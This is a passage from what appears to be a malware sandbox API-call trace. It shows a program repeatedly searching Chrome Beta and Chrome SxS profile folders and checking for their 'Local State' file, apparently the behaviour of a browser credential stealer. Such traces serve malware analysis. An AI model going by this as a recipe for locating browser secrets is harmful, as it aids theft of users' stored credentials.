ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.511] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.511] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.512] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.512] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.512] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.512] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.512] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.512] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.512] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.512] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.512] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.512] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.513] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.513] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.513] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.513] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.513] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.513] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.513] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.513] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.513] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.514] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.514] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.514] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.514] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.514] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.514] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.514] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.514] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.514] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.514] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.515] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.515] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.515] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.515] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.515] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.515] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.515] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.515] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.515] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.515] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.516] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.516] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.516] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.516] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.516] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.516] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.516] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome SxS\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0234.516] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0234.516] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State" [0234.516] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\local state")) returned 0xffffffff [0234.517] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*") returned 65 [0234.517] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x720065, ftCreationTime.dwLowDateTime=0x440020, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x5c0061, ftLastAccessTime.dwHighDateTime=0x6f004c, ftLastWriteTime.dwLowDateTime=0x610063, ftLastWriteTime.dwHighDateTime=0x20006c, nFileSizeHigh=0x740053, nFileSizeLow=0x740061, dwReserved0=0x65, dwReserved1=0x0, cFileName="", cAlternateFileName="n\x01")) returned 0xffffffff [0234.517] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.517] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.517] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.517] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.517] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.517] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.517] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.517] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.518] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0234.518] FindFirstFileA (in: 